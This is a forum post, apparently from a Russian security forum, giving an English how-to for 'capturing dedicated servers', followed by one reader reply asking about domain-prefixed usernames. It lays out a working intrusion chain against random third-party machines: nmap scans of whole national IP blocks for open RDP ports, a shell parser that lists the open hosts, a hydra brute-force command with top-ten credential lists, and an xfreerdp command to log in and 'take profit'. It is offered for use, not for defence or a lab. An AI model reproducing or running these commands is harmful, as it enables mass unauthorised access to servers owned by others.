• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Article Looking for the best algorithm for catching dedicated servers 2018

CYBERSATORI EXPERIENCE 4 CAPTURE DEDICATED SERVERS ON LINUX SYSTEM // My experience in capturing dedicated servers

CREATE NMAP SCRIPT FILE (Input All Major-IP Blocks of any Country here): // Wrap up next few rows in script, create a few txt files

http://www.ipdeny.com/ipblocks/ - here you can look on ip block lists for interesting us country but if you will scan all for one time you will see the results only on the next year.
So don't be greedy and scan for a little interest subnet, keeping journal and write scanned diapasons.

Код:
c='Path/To/Your/Script/Here'
nmap -sS -p3389 -PS3389 -oG $c/scannedOnlineServers.txt -iL $c/hostsIPRange.txt -vv

CREATE PARSER FILE (to select only OK IP's list): // create a sorting machine which will extract ip's with opened RDP port

Код:
p='/Path/To/Your/Script/Here'
grep -E '/open/' $p/scannedOnlineServers.txt | sed 's/Host: //' > $p/scanGhostFile.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -u > $p/openedServers.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -d » $p/openedServers.txt
rm $p/scanGhostFile.txt

PUT HYDRA COMAND (Best 4 Brute on Linux or use Metasploit experience): // nothing more funnier than hydra was not found, crowbar gives misses and stunnes,
so upload a few top ten dictionaries (admin - password) Hydra is good because not so more load the processor and can brute all day, all night without pause.
The best solution I think is to exploit sorted ip's with help of Metasploit but it is a theme for another article because fast and standart solutions for this i do not see.

Код:
hydra -L (loginTop10listHere) -P (passTop10listHere) -M (openedServersHere) -vV -o (SavedOKServers) rdp

TO CONTROL REMOTE DESKTOP : // enter to exploited shells and take profit

Код:
xfreerdp /u:LOGIN /p: PASSWORD /v:IP:3389

Good Luck and feel free to comment.
We are anonysts we are Legion.

26574


source: В поисках лучшего алгоритма по захвату дедиков в 2К18
 
  • Нравится
Реакции: Сергей Попов

sec13b

One Level
18.05.2023
4
1
BIT
1
and if trying to use creds that contained the windows domain prepended to the username?
Код:
ecorp\denis or ecorp\\denis
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!